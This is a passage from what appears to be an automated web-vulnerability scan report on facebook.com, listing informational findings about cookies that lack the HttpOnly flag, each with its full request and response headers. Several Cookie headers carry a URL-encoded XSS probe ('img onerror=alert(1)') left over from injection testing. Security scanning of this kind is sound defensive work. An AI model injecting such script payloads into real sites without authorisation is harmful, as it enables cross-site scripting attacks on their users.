<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.65. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.66. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=bYeMg; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.67. http://www.facebook.com/privacy/explanation.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.68. http://www.facebook.com/robynalys

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /robynalys

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.69. http://www.facebook.com/share.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.70. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.71. http://www.facebook.com/skdarealist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /skdarealist

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.72. http://www.facebook.com/stefanoboscolomarchi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /stefanoboscolomarchi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.73. http://www.facebook.com/theteebers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /theteebers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.74. http://www.facebook.com/wmoppert

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /wmoppert

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.75. https://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.76. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=bnJmV; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.77. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.78. https://www.facebook.com/help/contact.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
